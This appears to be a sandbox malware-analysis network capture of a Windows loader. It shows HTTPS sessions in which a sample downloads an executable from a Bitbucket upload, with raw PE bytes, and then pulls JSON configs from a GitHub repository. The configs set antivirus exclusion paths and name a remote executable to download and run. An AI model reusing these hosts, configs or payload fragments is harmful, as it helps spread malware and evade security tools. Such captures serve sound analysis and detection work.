                                                Location: https://bbuseruploads.s3.amazonaws.com/5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a-4f05-aba3-c7f453357584/Updated11.12.exe?response-content-disposition=attachment%3B%20filename%3D%22Updated11.12.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBSRNVB4O&Signature=OlwE0Z7zZ9D5y5awFM9ze3uDdNQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQDYfd%2BUjJB69jUrDiyn1ACmAHX7h00Ms9jdu77V8%2BbQiQIgZpc%2BMuqfuYdaGno1Dsx%2B7%2F1fwCn7flbDkj2a%2BGAQysgqpwIIFBAAGgw5ODQ1MjUxMDExNDYiDD4%2BkCpT2xQmd8KInCqEAvZwZorvFr4FTztBPDZNc9pDNqkH8vr7IuwfigaQALQGTrPZ0n7R7G8mqGRWhz4oaHR4A8Ys2xjzqZGWPRpx0BFDyTjkmyoax2AaGjEDU5jLO%2BI9eW7cP4cukvQKbCyWWaT5nH2nOvfjMtwrY7mMwVVTiar%2B39%2Byq5c%2B9nWv%2B%2FPilmtLMfv8xN8csgfCaXMfzMODVnTCTrFl761VH1766hS%2B5Cnh8uVySF0REGckmSLzCJ%2F0ZEYpa5suMbY8vBrSg7MNEaMobmU8RJEsTH84YYV9rPdjJvJZV5WyDYDN%2F9UJkRyE%2B75nvJfPzPEsxIOsO9LaiYwGWgye6WWMhiJmt%2FDDxtgtMIzctrYGOp0Bw0hHLf7CiJ1Ipvl%2FLmwUS8fG9wj2hiSRqVvcq7rKCQJfS2sjcFo0U551qCcKaGgnV0%2BuJkrF%2B5QqVA9lRII [TRUNCATED]
                                                Expires: Tue, 27 Aug 2024 10:55:13 GMT
                                                Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                X-Used-Mesh: False
                                                Vary: Accept-Language, Origin
                                                Content-Language: en
                                                X-View-Name: bitbucket.apps.downloads.views.download_file
                                                X-Dc-Location: Micros-3
                                                X-Served-By: 4fe2bbba71e1
                                                X-Version: e13784b917ea
                                                X-Static-Version: e13784b917ea
                                                X-Request-Count: 2803
                                                X-Render-Time: 0.05108356475830078
                                                X-B3-Traceid: 6fc2fe0f11614904af77cca29dbbc976
                                                X-B3-Spanid: 6f6d391b9badfe4d
                                                X-Frame-Options: SAMEORIGIN
                                                Content-Security-Policy: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassi [TRUNCATED]
                                                X-Usage-Quota-Remaining: 999030.695
                                                X-Usage-Request-Cost: 984.53
                                                X-Usage-User-Time: 0.027664
                                                X-Usage-System-Time: 0.001872
                                                X-Usage-Input-Ops: 0
                                                X-Usage-Output-Ops: 0
                                                Age: 0
                                                X-Cache: MISS
                                                X-Content-Type-Options: nosniff
                                                X-Xss-Protection: 1; mode=block
                                                Atl-Traceid: 6fc2fe0f11614904af77cca29dbbc976
                                                Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.54970752.216.214.2094432924C:\Users\user\Desktop\UBONg7lmVR.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-27 10:55:14 UTC1225OUTGET /5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a-4f05-aba3-c7f453357584/Updated11.12.exe?response-content-disposition=attachment%3B%20filename%3D%22Updated11.12.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBSRNVB4O&Signature=OlwE0Z7zZ9D5y5awFM9ze3uDdNQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQDYfd%2BUjJB69jUrDiyn1ACmAHX7h00Ms9jdu77V8%2BbQiQIgZpc%2BMuqfuYdaGno1Dsx%2B7%2F1fwCn7flbDkj2a%2BGAQysgqpwIIFBAAGgw5ODQ1MjUxMDExNDYiDD4%2BkCpT2xQmd8KInCqEAvZwZorvFr4FTztBPDZNc9pDNqkH8vr7IuwfigaQALQGTrPZ0n7R7G8mqGRWhz4oaHR4A8Ys2xjzqZGWPRpx0BFDyTjkmyoax2AaGjEDU5jLO%2BI9eW7cP4cukvQKbCyWWaT5nH2nOvfjMtwrY7mMwVVTiar%2B39%2Byq5c%2B9nWv%2B%2FPilmtLMfv8xN8csgfCaXMfzMODVnTCTrFl761VH1766hS%2B5Cnh8uVySF0REGckmSLzCJ%2F0ZEYpa5suMbY8vBrSg7MNEaMobmU8RJEsTH84YYV9rPdjJvJZV5WyDYDN%2F9UJkRyE%2B75nvJfPzPEsxIOsO9LaiYwGWgye6WWMhiJmt%2FDDxtgtMIzctrYGOp0Bw0hHLf7CiJ1Ipvl%2FLmwUS8fG9wj2hiSRqVvcq7rKCQJfS2sjcFo0U551qCcKaGgnV0%2BuJkrF%2B5QqVA9lRII9%2B31TsHrG000N%2BnH3LKfIQS48cfIAiUtpWMew1%2 [TRUNCATED]
                                                Host: bbuseruploads.s3.amazonaws.com
                                                Connection: Keep-Alive
                                                2024-08-27 10:55:14 UTC546INHTTP/1.1 200 OK
                                                x-amz-id-2: S1KyIekwOmajuce10dGrM9BD4Zh9pU7a71sol0el35WXZ4GDR7PCO3ke1sEZ+fxz03k6MlG2mOw=
                                                x-amz-request-id: TDE64GPW5DWEF5Q6
                                                Date: Tue, 27 Aug 2024 10:55:15 GMT
                                                Last-Modified: Mon, 26 Aug 2024 20:19:25 GMT
                                                ETag: "a499c507987982c951093e21df0c0d96"
                                                x-amz-server-side-encryption: AES256
                                                x-amz-version-id: izy_Ds9c9HofVlO8w4O6Dv7xs.26iHyB
                                                Content-Disposition: attachment; filename="Updated11.12.exe"
                                                Accept-Ranges: bytes
                                                Content-Type: application/x-msdownload
                                                Server: AmazonS3
                                                Content-Length: 8077824
                                                Connection: close
                                                2024-08-27 10:55:14 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0f 00 00 00 00 00 00 8a 75 00 cc 1d 00 00 f0 00 22 00 0b 02 03 00 00 7e 26 00 00 d4 03 00 00 00 00 00 a0 dc 06 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 b0 84 00 00 06 00 00 00 00 00 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdu"~&@`
                                                2024-08-27 10:55:14 UTC478INData Raw: 49 3b 66 10 0f 86 c1 00 00 00 55 48 89 e5 48 83 ec 28 48 8b 10 48 85 d2 74 72 48 83 7a 18 00 90 74 73 0f b6 72 17 40 f6 c6 20 74 30 48 8d 70 08 48 b9 21 a6 56 6a a1 6e 75 00 48 31 d9 48 89 d0 48 89 f3 e8 b8 00 00 00 48 ba bf 63 8f bb 6b ef 52 00 48 0f af c2 48 83 c4 28 5d c3 48 8b 70 08 48 b9 21 a6 56 6a a1 6e 75 00 48 31 d9 48 89 d0 48 89 f3 e8 88 00 00 00 48 ba bf 63 8f bb 6b ef 52 00 48 0f af c2 48 83 c4 28 5d c3 48 89 d8 48 83 c4 28 5d c3 48 89 d0 e8 e3 c7 05 00 b9 18 00 00 00 48 89 c7 48 89 de 31 c0 48 8d 1d 82 1e 2e 00 e8 4a ea 04 00 e8 e5 70 00 00 48 89 c3 48 8d 05 db 18 29 00 e8 f6 3e 03 00 90 48 89 44 24 08 48 89 5c 24 10 e8 a6 5c 06 00 48 8b 44 24 08 48 8b 5c 24 10 e9 17 ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                Data Ascii: I;fUHH(HHtrHztsr@ t0HpH!VjnuH1HHHckRHH(]HpH!VjnuH1HHHckRHH(]HH(]HHH1H.JpHH)>HD$H\$\HD$H\$
                                                2024-08-27 10:55:14 UTC16384INData Raw: 10 90 48 83 fa 04 74 2b 48 83 fa 08 75 11 48 89 d8 48 89 cb e8 e9 79 06 00 48 83 c4 58 5d c3 48 89 d8 48 89 cb 48 89 d1 e8 55 79 06 00 48 83 c4 58 5d c3 48 89 d8 48 89 cb e8 84 79 06 00 48 83 c4 58 5d c3 48 8b 54 24 50 48 83 c2 18 48 8b 74 24 40 48 ff ce 48 8b 5c 24 70 48 89 c1 0f 1f 44 00 00 48 85 f6 7e 53 48 89 74 24 40 48 89 4c 24 38 48 89 54 24 50 48 8b 02 48 8b 4a 08 48 89 4c 24 48 48 8b 5a 10 48 89 5c 24 30 e8 d2 c5 ff ff 84 c0 74 07 48 8b 44 24 38 eb a9 48 8b 54 24 70 48 8b 74 24 30 48 8d 1c 16 48 8b 44 24 48 48 8b 4c 24 38 e8 6a fe ff ff eb 8a 48 89 c8 48 83 c4 58 5d c3 48 8b 70 30 48 8b 3e 48 0f af fa 48 01 df 48 ff c2 48 89 54 24 28 48 89 f0 48 89 fb 0f 1f 00 e8 3b fe ff ff 48 8b 5c 24 70 48 8b 54 24 28 48 89 c1 48 8b 44 24 68 48 39 50 40 77 c4
                                                Data Ascii: Ht+HuHHyHX]HHHUyHX]HHyHX]HT$PHHt$@HH\$pHDH~SHt$@HL$8HT$PHHJHL$HHZH\$0tHD$8HT$pHt$0HHD$HHL$8jHHX]Hp0H>HHHHT$(HH;H\$pHT$(HHD$hH9P@w
                                                2024-08-27 10:55:14 UTC1024INData Raw: 5c 24 70 48 8b 4c 24 48 48 8d 3d d1 23 2e 00 be 20 00 00 00 e8 09 a9 04 00 eb 1d 31 c0 48 8b 5c 24 70 48 8b 4c 24 48 48 8d 3d ae 14 2e 00 be 1e 00 00 00 e8 ea a8 04 00 48 81 c4 f8 00 00 00 5d c3 48 8d bc 24 98 00 00 00 48 8d 7f e0 48 89 6c 24 f0 48 8d 6c 24 f0 e8 11 41 06 00 48 8b 6d 00 48 c7 84 24 a0 00 00 00 16 00 00 00 48 8d 15 9c c9 2d 00 48 89 94 24 98 00 00 00 48 89 9c 24 b0 00 00 00 48 89 84 24 a8 00 00 00 48 c7 84 24 c0 00 00 00 08 00 00 00 48 8d 15 28 59 2d 00 48 89 94 24 b8 00 00 00 48 8b 54 24 60 48 89 94 24 d0 00 00 00 48 8b 94 24 88 00 00 00 48 89 94 24 c8 00 00 00 48 c7 84 24 e0 00 00 00 11 00 00 00 48 8d 15 b4 99 2d 00 48 89 94 24 d8 00 00 00 48 8b 51 18 48 8b 71 20 48 89 b4 24 f0 00 00 00 48 89 94 24 e8 00 00 00 31 c0 48 8d 9c 24 98 00 00
                                                Data Ascii: \$pHL$HH=#. 1H\$pHL$HH=.H]H$HHl$Hl$AHmH$H-H$H$H$H$H(Y-H$HT$`H$H$H$H$H-H$HQHq H$H$1H$
                                                2024-08-27 10:55:14 UTC16384INData Raw: 00 00 80 fa 78 0f 85 97 00 00 00 84 c9 74 75 48 85 c0 7d 66 49 8d 50 01 48 39 d6 73 50 48 89 f8 48 89 d3 48 89 f1 bf 01 00 00 00 48 8d 35 90 c6 27 00 e8 6b 67 04 00 4c 8b 8c 24 e8 00 00 00 4c 8b 94 24 28 01 00 00 4c 8b 9c 24 10 01 00 00 48 89 da 48 89 c7 48 89 ce 48 8b 84 24 18 01 00 00 0f b6 4c 24 6b 48 8b 9c 24 20 01 00 00 c6 44 3a ff 2d 49 89 c4 49 f7 dc eb 10 4c 89 c2 49 89 c4 66 90 eb 06 4c 89 c2 49 89 c4 44 0f 11 7c 24 57 44 0f 11 7c 24 5b 41 b8 13 00 00 00 e9 2a 02 00 00 90 80 fa 79 0f 85 85 00 00 00 48 85 db 7d 66 49 8d 50 01 48 39 d6 73 50 48 89 f8 48 89 d3 48 89 f1 bf 01 00 00 00 48 8d 35 f4 c5 27 00 e8 cf 66 04 00 4c 8b 8c 24 e8 00 00 00 4c 8b 94 24 28 01 00 00 4c 8b 9c 24 10 01 00 00 48 89 da 48 89 c7 48 89 ce 48 8b 84 24 18 01 00 00 0f b6 4c
                                                Data Ascii: xtuH}fIPH9sPHHHH5'kgL$L$(L$HHHH$L$kH$ D:-IILIfLID|$WD|$[A*yH}fIPH9sPHHHH5'fL$L$(L$HHHH$L
                                                2024-08-27 10:55:14 UTC1024INData Raw: 8b 36 4d 8b 36 b8 80 96 98 00 e8 73 8d 02 00 85 c0 7c c4 eb a7 cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 51 55 48 89 e5 48 83 ec 20 49 8b 4e 30 4c 89 f2 48 39 11 75 2b 48 89 44 24 30 48 89 5c 24 38 48 89 c8 e8 74 90 02 00 48 8b 44 24 30 48 8b 5c 24 38 31 c9 31 ff e8 41 fd ff ff 48 83 c4 20 5d c3 48 8d 05 31 73 2d 00 bb 14 00 00 00 e8 2a c5 02 00 90 48 89 44 24 08 48 89 5c 24 10 e8 1a d7 05 00 48 8b 44 24 08 48 8b 5c 24 10 eb 8e cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 65 55 48 89 e5 48 83 ec 28 49 8b 4e 30 4c 89 f2 48 39 11 74 3f 48 89 44 24 38 48 89 5c 24 40 48 89 c8 e8 f4 8f 02 00 e8 4f 7b 03 00 48 8b 44 24 38 48 8b 5c 24 40 31 c9 31 ff 90 e8 bb fc ff ff 88 44 24 27 e8 32 a1 05 00 0f b6 44 24 27 48 83 c4 28 5d c3 48 8d 05 99
                                                Data Ascii: 6M6s|I;fvQUHH IN0LH9u+HD$0H\$8HtHD$0H\$811AH ]H1s-*HD$H\$HD$H\$I;fveUHH(IN0LH9t?HD$8H\$@HO{HD$8H\$@11D$'2D$'H(]H
                                                2024-08-27 10:55:14 UTC16384INData Raw: 00 00 e8 3b dc 02 00 48 8d 05 22 5c 2d 00 bb 12 00 00 00 e8 aa e4 02 00 48 8b 05 83 7c 59 00 0f 1f 00 e8 db e1 02 00 48 8d 05 75 01 2e 00 bb 25 00 00 00 e8 8a e4 02 00 b8 00 10 00 00 0f 1f 44 00 00 e8 9b e2 02 00 48 8d 05 46 02 2d 00 bb 02 00 00 00 e8 6a e4 02 00 e8 45 dc 02 00 48 8d 05 4f 6f 2d 00 bb 14 00 00 00 e8 34 c1 02 00 e8 cf db 02 00 48 8d 05 b6 5b 2d 00 bb 12 00 00 00 0f 1f 00 e8 3b e4 02 00 48 8b 05 14 7c 59 00 e8 6f e1 02 00 48 8d 05 c9 f8 2d 00 bb 24 00 00 00 0f 1f 00 e8 1b e4 02 00 b8 00 00 08 00 e8 31 e2 02 00 48 8d 05 dc 01 2d 00 bb 02 00 00 00 0f 1f 44 00 00 e8 fb e3 02 00 e8 d6 db 02 00 48 8d 05 e0 6e 2d 00 bb 14 00 00 00 e8 c5 c0 02 00 48 8d 05 34 cc 2d 00 bb 1e 00 00 00 e8 b4 c0 02 00 48 8d 05 b7 51 2d 00 bb 11 00 00 00 e8 a3 c0 02 00
                                                Data Ascii: ;H"\-H|YHu.%DHF-jEHOo-4H[-;H|YoH-$1H-DHn-H4-HQ-
                                                2024-08-27 10:55:14 UTC1024INData Raw: 5d 90 c3 0f b7 78 52 48 8d 3c 3e 48 8d 7f f8 48 8b 37 48 85 f6 74 1e 48 89 b4 24 a0 00 00 00 0f b6 78 50 90 4c 8d 56 08 48 8d 3c fe 48 8d 7f 08 45 31 db eb 6d 0f b6 73 08 40 f6 c6 02 75 9d 48 8b 70 40 48 83 7e 08 00 74 92 0f b7 48 52 48 89 ce 48 0f af ca 48 83 c6 f8 48 03 4b 18 48 83 c1 08 90 48 89 c8 48 89 f3 e8 35 3a 00 00 48 8b 84 24 b8 00 00 00 48 8b 54 24 40 48 8b 9c 24 c0 00 00 00 4c 8b 4c 24 20 e9 50 ff ff ff 44 0f b6 60 50 44 0f b6 68 51 49 ff c3 4d 01 e2 4c 01 ef 0f 1f 00 49 83 fb 08 0f 8d 57 ff ff ff 46 0f b6 24 1e 41 80 fc 01 77 0b 42 c6 04 1e 04 eb ce 0f 1f 40 00 41 80 fc 05 0f 82 60 03 00 00 44 8b 68 54 41 0f ba e5 00 73 05 4d 8b 2a eb 03 4d 89 d5 4c 89 5c 24 28 48 89 bc 24 98 00 00 00 4c 89 ac 24 88 00 00 00 4c 89 94 24 90 00 00 00 44 0f b6
                                                Data Ascii: ]xRH<>HH7HtH$xPLVH<HE1ms@uHp@H~tHRHHHHKHHH5:H$HT$@H$LL$ PD`PDhQIMLIWF$AwB@A`DhTAsM*ML\$(H$L$L$D
                                                2024-08-27 10:55:14 UTC16384INData Raw: b6 60 50 4e 01 64 0c 58 44 0f b6 60 51 4e 01 64 0c 60 44 89 c1 4c 8b 4c 24 20 e9 6d fc ff ff 4c 89 c8 b9 02 00 00 00 e8 56 b2 05 00 48 8d 05 49 ed 2c 00 bb 0d 00 00 00 e8 65 7d 02 00 90 48 89 44 24 08 48 89 5c 24 10 48 89 4c 24 18 e8 50 8f 05 00 48 8b 44 24 08 48 8b 5c 24 10 48 8b 4c 24 18 90 e9 7b fa ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 9e 00 00 00 55 48 89 e5 48 8b 50 20 48 8d 72 01 48 89 70 20 48 81 c2 01 04 00 00 48 39 d1 48 0f 42 d1 eb 07 48 ff c6 48 89 70 20 48 8b 70 20 48 39 d6 74 19 0f b7 7b 52 48 0f af fe 48 03 78 18 0f b6 3f 83 c7 fe 90 40 80 ff 03 72 d7 48 39 f1 75 4e 83 3d 41 3b 59 00 00 90 74 0c 48 8b 48 18 e8 d5 ad 05 00 49 89 0b 48 c7 40 18 00 00 00 00 48 8b 48 28 48 85 c9
                                                Data Ascii: `PNdXD`QNd`DLL$ mLVHI,e}HD$H\$HL$PHD$H\$HL${I;fUHHP HrHp HH9HBHHp Hp H9t{RHHx?@rH9uN=A;YtHHIH@HH(H
                                                2024-08-27 10:55:14 UTC1024INData Raw: 89 44 24 28 84 00 c6 04 02 a1 48 89 c3 48 8b 44 24 40 e8 6b 00 00 00 48 8b 5c 24 28 48 8b 4c 24 20 0f b6 0c 19 80 f9 a1 75 06 48 83 c4 30 5d c3 48 8d 05 be 2c 2d 00 bb 1b 00 00 00 e8 61 3d 02 00 48 89 d0 e8 39 72 05 00 ba 00 00 00 40 e8 8f 72 05 00 90 48 89 44 24 08 48 89 5c 24 10 0f 1f 40 00 e8 3b 4f 05 00 48 8b 44 24 08 48 8b 5c 24 10 e9 2c ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 48 89 e5 48 89 d9 31 d2 31 f6 e9 12 01 00 00 4c 89 e1 4c 89 c8 4c 89 d3 e9 04 01 00 00 0f b6 38 90 49 89 f8 83 e7 7f 4c 8d 48 01 41 0f ba e0 07 72 14 48 85 ff 0f 84 f1 00 00 00 48 c1 ef 03 31 c0 e9 65 03 00 00 48 85 ff 75 09 31 c0 31 ff e9 e2 02 00 00 31 c0 45 31 c0 e9 f0 00 00 00 48 0f af c7 48 83 ff 39 77 10 90 4c 8d 43 ff 48 89 d1 49 89 f2 e9 5f 01 00 00 48 29 d7 4c
                                                Data Ascii: D$(HHD$@kH\$(HL$ uH0]H,-a=H9r@rHD$H\$@;OHD$H\$,UHH11LLL8ILHArHH1eHu111E1HH9wLCHI_H)L


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.549711185.199.111.133443320C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-27 10:55:20 UTC140OUTGET /workhasf/kelm/main/yjsefceawd.json HTTP/1.1
                                                Host: raw.githubusercontent.com
                                                User-Agent: Go-http-client/1.1
                                                Accept-Encoding: gzip
                                                2024-08-27 10:55:21 UTC897INHTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 254
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: text/plain; charset=utf-8
                                                ETag: "2b7d5e7976210b6b6243eb731562fda7633790a0d3e8fe06e97c427ca3df3b40"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: C138:B7845:695157:749E29:66CDB080
                                                Accept-Ranges: bytes
                                                Date: Tue, 27 Aug 2024 10:55:21 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-ewr-kewr1740042-EWR
                                                X-Cache: HIT
                                                X-Cache-Hits: 1
                                                X-Timer: S1724756121.054269,VS0,VE1
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: 91e0a91cd95d8a87aefa6dc3ad0d6c4ba2f7a4cf
                                                Expires: Tue, 27 Aug 2024 11:00:21 GMT
                                                Source-Age: 14
                                                2024-08-27 10:55:21 UTC254INData Raw: 7b 0d 0a 20 20 22 66 6f 6c 64 65 72 5f 70 61 74 68 22 3a 20 22 43 3a 5c 5c 52 65 6b 61 22 2c 0d 0a 20 20 22 61 64 64 5f 65 78 63 6c 75 73 69 6f 6e 73 22 3a 20 74 72 75 65 2c 0d 0a 20 20 22 65 78 63 6c 75 73 69 6f 6e 5f 70 61 74 68 73 22 3a 20 5b 0d 0a 20 20 20 20 22 43 3a 5c 5c 55 73 65 72 73 22 2c 0d 0a 20 20 20 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 22 2c 0d 0a 20 20 20 20 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 22 2c 0d 0a 20 20 20 20 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 20 28 78 38 36 29 22 2c 0d 0a 20 20 20 20 22 43 3a 5c 5c 52 65 63 6f 76 65 72 79 22 2c 0d 0a 20 20 20 20 22 43 3a 5c 5c 52 65 6b 61 22 2c 0d 0a 20 20 20 20 22 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 5c 44 65 73 6b 74 6f 70 22 0d 0a 20 20 5d 0d 0a 7d
                                                Data Ascii: { "folder_path": "C:\\Reka", "add_exclusions": true, "exclusion_paths": [ "C:\\Users", "C:\\Windows", "C:\\Program Files", "C:\\Program Files (x86)", "C:\\Recovery", "C:\\Reka", "%USERPROFILE%\\Desktop" ]}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.549712185.199.111.133443320C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-27 10:55:21 UTC141OUTGET /workhasf/kelm/main/nepipirusas.json HTTP/1.1
                                                Host: raw.githubusercontent.com
                                                User-Agent: Go-http-client/1.1
                                                Accept-Encoding: gzip
                                                2024-08-27 10:55:21 UTC898INHTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 271
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: text/plain; charset=utf-8
                                                ETag: "8afdee626e191786c845a423ef408c35314075f4a1c4350f44a55f7503d99b00"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: ACF5:EC530:6D5E83:78ABE5:66CDB097
                                                Accept-Ranges: bytes
                                                Date: Tue, 27 Aug 2024 10:55:21 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-nyc-kteb1890078-NYC
                                                X-Cache: MISS
                                                X-Cache-Hits: 0
                                                X-Timer: S1724756122.614030,VS0,VE10
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: 5fc20857a82042935cb24f6492627ce30210505d
                                                Expires: Tue, 27 Aug 2024 11:00:21 GMT
                                                Source-Age: 0
                                                2024-08-27 10:55:21 UTC271INData Raw: 7b 0d 0a 20 20 22 64 6f 77 6e 6c 6f 61 64 73 22 3a 20 5b 0d 0a 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 22 64 6f 77 6e 6c 6f 61 64 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 77 6f 72 6b 68 61 73 66 2f 6b 65 6c 6d 2f 72 61 77 2f 6d 61 69 6e 2f 69 63 6f 6e 6f 7a 61 76 65 2e 65 78 65 22 2c 0d 0a 20 20 20 20 20 20 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 20 22 72 61 70 6e 65 77 73 61 2e 65 78 65 22 2c 0d 0a 20 20 20 20 20 20 22 72 75 6e 22 3a 20 74 72 75 65 0d 0a 20 20 20 20 7d 2c 0d 0a 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 22 64 6f 77 6e 6c 6f 61 64 5f 75 72 6c 22 3a 20 22 22 2c 0d 0a 20 20 20 20 20 20 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 20 22 64 6c 6c 2e 65 78 65 22 2c 0d 0a 20 20 20 20 20 20 22 72 75 6e 22 3a 20 66 61 6c 73
                                                Data Ascii: { "downloads": [ { "download_url": "https://github.com/workhasf/kelm/raw/main/iconozave.exe", "file_name": "rapnewsa.exe", "run": true }, { "download_url": "", "file_name": "dll.exe", "run": fals


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.549721140.82.121.3443320C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-27 10:55:51 UTC127OUTGET /workhasf/kelm/raw/main/iconozave.exe HTTP/1.1
                                                Host: github.com
                                                User-Agent: Go-http-client/1.1
                                                Accept-Encoding: gzip
                                                2024-08-27 10:55:51 UTC547INHTTP/1.1 302 Found
                                                Server: GitHub.com
                                                Date: Tue, 27 Aug 2024 10:55:35 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                Access-Control-Allow-Origin:
                                                Location: https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exe
                                                Cache-Control: no-cache
                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                X-Frame-Options: deny
                                                X-Content-Type-Options: nosniff
                                                X-XSS-Protection: 0
                                                Referrer-Policy: no-referrer-when-downgrade
                                                2024-08-27 10:55:51 UTC3261INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
